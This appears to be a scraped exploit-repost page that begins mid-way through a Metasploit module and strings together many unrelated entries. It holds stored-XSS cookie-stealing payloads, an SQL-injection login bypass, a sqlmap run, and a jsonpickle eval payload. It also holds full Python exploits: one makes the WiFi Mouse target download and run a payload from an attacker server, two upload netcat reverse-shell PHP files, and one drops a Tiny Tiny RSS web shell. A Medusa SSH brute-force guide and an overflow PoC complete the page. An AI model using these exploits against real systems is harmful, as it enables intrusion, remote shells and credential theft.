'modules', 'set' => datastore["MODULE"], 'module' => datastore["SETTING"], 'action' => 'save' }, 'vars_post' => @secme ) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'vars_get' => { 'cmd' => 'modules', 'set' => datastore["MODULE"], 'module' => datastore["SETTING"], 'action' => 'edit' }, 'cookie' => @cookie ) end end end
HireHackking

Comment System 1.0 - 'multiple' Stored Cross-Site Scripting

HACKER · %s · %s

# Exploit Title: Comment System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-18 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14713/comment-system-phpmysqli-full-source-code.html # Software: : Comment System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/comment/index.php # Vulnerable Input Field : Your Name: "><script>alert(document.cookie)</script> Comment: "><script>alert(document.cookie)</script> # Payload used: "><script>alert(document.cookie)</script> # POC: Whenever we will go to the page (http://localhost/comment/index.php) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.
HireHackking
# Exploit Title: Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass # Date: 2021-02-18 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/13877/online-exam-timer.html # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # This application is vulnerable to SQL injection vulnerability. # Vulnerable Page: http://localhost/CEE/adminpanel/admin/index.php # Payload used: Email => ' or 'x'='x Password => ' or 'x'='x # POC: Whenever we will go to the page (http://localhost/CEE/adminpanel/admin/index.php) when we inject SQL Payload then we will directly enter into the Admin Panel page.
HireHackking

Beauty Parlour Management System 1.0 - 'sername' SQL Injection

HACKER · %s · %s

# Exploit Title: Beauty Parlour Management System 1.0 - 'sername' SQL Injection # Date: 19/2/2021 # Exploit Author: Thinkland Security Team # Vendor Homepage: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/wp-content/uploads/2019/08/Beauty-Parlour-Management-System.zip # Version: V 1.0 # Tested on: Windows、XAMPP # Identify the vulnerability 1. go to http://localhost/bpms/admin/ and login with your account 2. then go to http://localhost/bpms/admin/edit-services.php?editid=17 3. Save the packet data as 3.txt POST /bpms/admin/edit-services.php?editid=17 HTTP/1.1 Host: http://localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/bpms/admin/edit-services.php?editid=17 Cookie: PHPSESSID=qaqv7jl8dqci4i2nldnj4n60s0 Upgrade-Insecure-Requests: 1 sername=%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E&cost=1&submit= # Exploit Now you can exploit it using sqlmap command: sqlmap -r file --batch --dbms=mysql --current-db example: sqlmap.py -r 3.txt --batch --dbms=mysql --current-db &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; __H__ &nbsp;___ ___[.]_____ ___ ___&nbsp; {1.4.10.16#dev} |_ -| . [.]&nbsp;&nbsp;&nbsp;&nbsp; | .'| . | |___|_&nbsp; [)]_|_|_|__,|&nbsp; _| &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |_|V...&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |_|&nbsp;&nbsp; http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:30:14 /2021-02-19/ [09:30:14] [INFO] parsing HTTP request from '3.txt' it appears that provided value for POST parameter 'sername' has boundaries. Do you want to inject inside? ('<img src%3D1 onerror%3Dalert(/xss*/)>') [y/N] N [09:30:14] [WARNING] provided value for parameter 'submit' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [09:30:14] [INFO] testing connection to the target URL [09:30:15] [INFO] testing if the target URL content is stable [09:30:15] [INFO] target URL content is stable [09:30:15] [INFO] testing if POST parameter 'sername' is dynamic [09:30:15] [WARNING] POST parameter 'sername' does not appear to be dynamic [09:30:15] [WARNING] heuristic (basic) test shows that POST parameter 'sername' might not be injectable [09:30:15] [INFO] testing for SQL injection on POST parameter 'sername' [09:30:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:30:15] [WARNING] reflective value(s) found and filtering out [09:30:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [09:30:16] [INFO] testing 'Generic inline queries' [09:30:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [09:30:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [09:30:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:30:16] [WARNING] time-based comparison requires larger statistical model, please wait........ (done) [09:30:26] [INFO] POST parameter 'sername' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [09:30:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [09:30:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [09:30:27] [INFO] checking if the injection point on POST parameter 'sername' is a false positive POST parameter 'sername' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests: --- Parameter: sername (POST) &nbsp;&nbsp;&nbsp; Type: time-based blind &nbsp;&nbsp;&nbsp; Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) &nbsp;&nbsp;&nbsp; Payload: sername=<img src=1 onerror=alert(/xss/)>' AND (SELECT 3311 FROM (SELECT(SLEEP(5)))YaHW) AND 'HGFO'='HGFO&cost=1&submit= --- [09:30:42] [INFO] the back-end DBMS is MySQL [09:30:42] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [09:30:47] [INFO] fetching current database [09:30:47] [INFO] retrieved: [09:30:57] [INFO] adjusting time delay to 1 second due to good response times bpmsdb current database: 'bpmsdb' [09:31:15] [INFO] fetched data logged to text files under
HireHackking

Monica 2.19.1 - 'last_name' Stored XSS

HACKER · %s · %s

# Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS # Date: 22-02-2021 # Exploit Author: BouSalman # Vendor Homepage: https://www.monicahq.com/ # Software Link: https://github.com/monicahq/monica/releases # Version: Monica 2.19.1 # Tested on: Ubuntu 18.04 # CVE : CVE-2021-27370 POST /people HTTP/1.1 Host: 192.168.99.162 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 199 Origin: http://192.168.99.162 Connection: close Referer: http://192.168.99.162/people/add Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=eyJpdiI6InIwQ2RlQW9FRG5lanlOZmlXWXBRVEE9PSIsInZhbHVlIjoiUHhPNmZneXUydGVCZHlVMEI5cHpiTWI2OE5qajN5UVJXUmJHSFV1VGgya2NEbEJ6T3N0QVhKeUZwU0R4a05HWTgwNTNidTk4aGNXc3UzejY4WDJnaUJ0VUp1ekQ5cjVDc0hLSWpGTzc1ZWRRQ05Yem0vK3RZdEpOVHNQeE4rQ1orbXNJTXhWczJnMENYeGp6Q3NnOGU5TXhpZDd1bS9wRlBZS0xsYmpLSXJiMHhSVmU2NnBUMjdYS1RTQmJrNkU4cWNtZGJVdjFpaXp5a2YzdVZsWWxQMjBicDQxUGFjZlhGbmhCOHl2MkVXdzRoalNtbE9xL010clpZMGJNVmVQNWUzQlpsRFVKamlWQ2Jydk9sZWg3cHNKWVIvRW92alp0YURJcllXa08rTjA4Y2lvVzNHTXBrem11Q21xaW92cEwiLCJtYWMiOiI1YjM5NzViODhjNTk5MWUzNWFjZDg0ZWZmNjk1NjE3MzhhN2M0NGFjNWE3MzMyMGFhNTI2ZjgxMjE4OTRjZDg4In0%3D; XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D; laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D Upgrade-Insecure-Requests: 1 _token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true
HireHackking

Batflat CMS 1.3.6 - 'multiple' Stored XSS

HACKER · %s · %s

# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS # Date: 22/02/2021 # Exploit Author: Tadjmen # Vendor Homepage: https://batflat.org/ # Software Link: https://github.com/sruupl/batflat/archive/master.zip # Version: 1.3.6 # Tested on: Xammpp on Windows, Firefox Newest # CVE : N/A Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6 Login with editor account with rights to Navigation, Galleries, Snippets Navigation - Add link payload: "><img src=x onerror=alert(document.cookie)> Galleries - Add gallery payload: mlem"><svg/onload=alert(1)> Snippets - Add Snippets payload: mlem"><svg/onload=alert("TuongNC")> More information: https://github.com/sruupl/batflat/issues/105
HireHackking

python jsonpickle 2.0.0 - Remote Code Execution

HACKER · %s · %s

# Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution # Date: 24-2-2021 # Vendor Homepage: https://jsonpickle.github.io # Exploit Author: Adi Malyanker, Shay Reuven # Software Link: https://github.com/jsonpickle/jsonpickle # Version: 2.0.0 # Tested on: windows, linux # Python is an open source language. jsonickle module is provided to convert objects into a serialized form, # and later recover the data back into an object. the decode is used to undeserialize serialized strings. # If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls. # the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr". # The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet # the payload was found during our research made on deserialization functions. # the pattern should be : # {..{"py/repr":<the module to import>/<the command to be executed.>}..} # example: malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}' # the command on the server side some_parameter = jsonpickle.decode(malicious)
HireHackking

WiFi Mouse 1.7.8.5 - Remote Code Execution

HACKER · %s · %s

# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution # Date: 25-02-2021 # Author: H4rk3nz0 # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.7.8.5 # Tested on: Windows Enterprise Build 17763 # Desktop Server software used by mobile app has PIN option which does not to prevent command input. # Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. #!/usr/bin/python from socket import socket, AF_INET, SOCK_STREAM from time import sleep import sys import string target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3] except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} def openCMD(): target.sendto("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a".decode("hex"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe def SendString(string): for char in string: target.sendto(("7574663820" + characters[char] + "0a").decode("hex"),(rhost,port)) # Sends Character hex with packet padding sleep(0.03) def SendReturn(): target.sendto("6b657920203352544e".decode("hex"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") def main(): target.connect((rhost,port)) exploit() target.close() exit() if __name__=="__main__": main()
HireHackking
# Exploit Title: Online Catering Reservation System 1.0 - Unauthenticated Remote Code Execution # Date: 28-02-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11355/online-catering-reservation.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # #The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): random_file_name = str(random.randint(100000, 999999)) + "revshell.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'id': '1337', 'menu':'PWN', 'cat': '1337', 'subcat':'PWN','desc':'PWN','price':'13.37', 'image': (random_file_name, revshell_string, 'application/x-php'),'update':''}) print("(+) Uploading php reverse shell..") r1 = requests.post('http://{}/reservation/admin/menu_update.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) if "Successfully updated menu details!" in r1.text: print("(+) File upload seems to have been successful!") return random_file_name else: print("(-) Oh no, file upload seems to have failed.. quitting.") exit() def trigger_shell(target_ip, filename): url = 'http://{}/reservation/images/{}'.format(target_ip, filename) print("(+) Now trying to trigger our shell by requesting {} ..".format(url)) r2 = requests.get(url) return None def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] uploaded_filename = file_upload(target_ip, attacker_ip, attacker_port) trigger_shell(target_ip, uploaded_filename) print("\n(+) done!") if __name__ == "__main__": main()
HireHackking
# Exploit Title: Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated) # Date: 28-02-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): random_file_name = str(random.randint(100000, 999999)) + "revshell.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'name': 'PWNED', 'img': (random_file_name, revshell_string, 'application/x-php')}) print("(+) Uploading php reverse shell..") r1 = requests.post('http://{}/cts_qr/classes/SystemSettings.php?f=update_settings'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) if r1.text == '1': print("(+) File upload seems to have been successful!") return None else: print("(-) Oh no, the file upload seems to have failed!") exit() def trigger_shell(target_ip): print("(+) Now trying to trigger our shell..") #The file we uploaded previously is expected to be an image that the web app tries to embed into the login page. #So by requesting the login page, our reverse shell php file will get triggered automatically. We dont even need to calculate the random bits of its new name. r2 = requests.get('http://{}/cts_qr/login.php'.format(target_ip)) return None def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] file_upload(target_ip, attacker_ip, attacker_port) trigger_shell(target_ip) print("\n(+) done!") if __name__ == "__main__": main()
HireHackking

Tiny Tiny RSS - Remote Code Execution

HACKER · %s · %s

# Exploit Title: Tiny Tiny RSS - Remote Code Execution # Date: 21/09/2020 # Exploit Author: Daniel Neagaru & Benjamin Nadarević # Blog post: https://www.digeex.de/blog/tinytinyrss/ # Software Link: https://git.tt-rss.org/fox/tt-rss # Version: all before 2020-09-16 # Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef # Tested on: default docker installation method # CVE : CVE-2020-25787 #!/usr/bin/env python3 from sys import argv import urllib.parse as ul import base64 def CustomFcgi( filename, output, backdoor): length=len(output)+len(backdoor)+64 char=chr(length) data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length))) data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n" data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/" temp1 = chr(len(data) // 256) temp2 = chr(len(data) % 256) temp3 = chr(len(data) % 8) end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00" end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00" start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00" payload = start + data + end def get_payload(payload): finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/") return finalpayload return "gopher://localhost:9000/_"+get_payload(get_payload(payload)) TTRSS_PATH = "/var/www/html/tt-rss/" BACKDOOR_CODE = """ <?php echo "success\n"; echo system($_GET['cmd']); ?> """ feed_file = open("malicious_RCE_feed.xml",'w') filename = TTRSS_PATH + "config.php" output = TTRSS_PATH + "backdoor.php" backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii")) rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text" feed ="""<?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"> <channel> <title>Exploit demo - rce</title> <link></link> <description>You are getting infected :(</description> <item> <title> Check if there is backdoor.php</title> <link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link> <description> <![CDATA[ Dummy text <img src="{}"> ]]> </description> </item> </channel> </rss> """.format(rce) feed_file.write(feed) feed_file.close()
HireHackking
# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting # Date: 2021-03-02 # Exploit Author: P.Naveen Kumar # Vendor Homepage: https://www.sourcecodester.com # Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software : Web Based Quiz System # Version : 1.0 # Vulnerability Type : Cross-site Scripting # Vulnerability : Persistent/Stored XSS # Tested on: Windows 10 Pro # Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe # in registration form in name parameter affected from this vulnerability. # payload: <script>alert(document.cookie)</script> # HTTP POST request POST http://localhost:8080/quiz/register.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636 Content-Length: 690 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/quiz/register.php Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er Upgrade-Insecure-Requests: 1 -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="name" <script>alert(document.cookie)</script> -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="email" test123@gmail.com -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="password" Hacker -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="college" hello -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="submit" -----------------------------283640616528311462411171270636-- POC: # go to url http://localhost:8080/quiz/register.php # then you have to fill the above payload in name/username parameter # then fill the remaining details # then click submit # then login to user account # then attempt any one quiz after attempting go to ranking section then # you can see xss pop up there..!
HireHackking

Title: Medusa Beginner Guide My sister-in-law will use it

HACKER · %s · %s

Medusa is a fast, large-scale parallel, modular explosive cracking tool. Strong tests can be performed on multiple hosts, users, or passwords at the same time. Medusa, like hydra, is also an online password cracking tool. Medusa is a password blasting tool that supports AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, RDP, rlogin, rsh, SMBNT, SMTP(AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC, Generic Wrapper and Web forms.
Grammar
mudusa -h
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] command detailed explanation: -h: Destination host IP
-H: file (when there are multiple targets, you can put the IP into one file)
-u: Single username
-U: User Name Dictionary File
-p: Single password
-P: Password file
-M: Module
Password cracking for specified username
If the username and protocol are both known, we can use medusa to crack the password.
The command is as follows:
medusa -h 192.168.50.1 -u priess -P /root/zi.txt -M ssh
Account and password cracking
The user name and password are unknown, the command is as follows
medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh Here, we use the -U option as the username file, the -P option for the password file, and the -h option for the hostname.
Display module usage information
You can use the new option -q, which will display the usage information of the module. This should be used in conjunction with the -M option.
medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh -q
Successfully stopped
When using the above command, the attack will continue despite the correct username and password, which can take a long time when the username and password list is long. Therefore, as an example, we only need to add the parameter -f
medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh -f
HireHackking

dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)

HACKER · %s · %s

# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC) # Exploit Author: Kağan Çapar # Date: 2020-02-17 # Vendor Homepage: https://www.ddc-web.com/ # Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414 # Version: 4.5.3 # Tested On: Windows 10 Enterprise (x64) # about Sofware: # dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort. # about ARINC 664-1: # ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. # Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®). #!/usr/bin/env python # -*- coding: UTF-8 -*- import struct import binascii import os import sys #EAX : 00000000 #EBX : 00000000 #ECX : 42424242 #EDX : 77B96330 ntdll.77B96330 #EBP : 000A1328 #ESP : 000A1308 #ESI : 00000000 #EDI : 00000000 #EIP : 42424242 #EFLAGS : 00010246 #LastError : 00000000 (ERROR_SUCCESS) #LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND) #Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)! file = open("milstd1553result.txt", "w") junk = "\x41" * 600 align = "\x32" * 4 + "\x31" * 4 prop = "\x43" * 380 imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32" imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a" #EIP Overwrite junk value overwrite = "\x42" * 4 #Payload size: 29 bytes #Final size of py file: 160 bytes #msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai buf = b"" buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33" buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9" buf += b"\x8b\x7c\x9c" win32 = junk + align + prop + imp + imp2 + overwrite + buf print len(win32) file.write(win32) file.close()
HireHackking
# Exploit Title: OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting # Date: 19/02/2021 # Exploit Author: Kamil Breński # Vendor Homepage: https://www.opentext.com/ # Software Link: https://www.opentext.com/products-and-solutions/products/enterprise-content-management/content-management # Version: 20.3 ========================================================================================== 1.) Document version XSS ========================================================================================== A user with permissions to create new document versions could create a malicious stored cross-site scripting payload. The description value would be reflected by the server without proper sanitization resulting in a stored XSS vulnerability. ------------------------------------------------------------------------------------------ POST /otcs/cs.exe HTTP/1.1 Host: redacted User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------------------------20043647051137266192675354452 Content-Length: 2071 Origin: https://redacted Connection: close [snipped] -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="func" doc.addversion2 -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="nodeID" 1125007 [snipped] -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="comment" <svg/onload=alert()> -----------------------------20043647051137266192675354452 [snipped] ------------------------------------------------------------------------------------------ Next a user which visits the version site will execute the malicious javascript. An example URL will look like the following: ------------------------------------------------------------------------------------------ https://redacted/otcs/cs.exe?func=ll&objId=1125007&objAction=versions&nexturl=%2Fotcs%2Fcs%2Eexe%3Ffunc%3Dll%26objid%3D1121694%26objAction%3Dbrowse%26sort%3Dname ------------------------------------------------------------------------------------------ ========================================================================================== 2.) Project Banner XSS ========================================================================================== A project banner could be crafter in such a way that clicking it would result in the execution of user defined javascript. The application did not validate the scheme used by the user supplied URL and it could be set to "javascript://". The request which saved the payload on the server look like the following: ------------------------------------------------------------------------------------------ POST /otcs/cs.exe HTTP/1.1 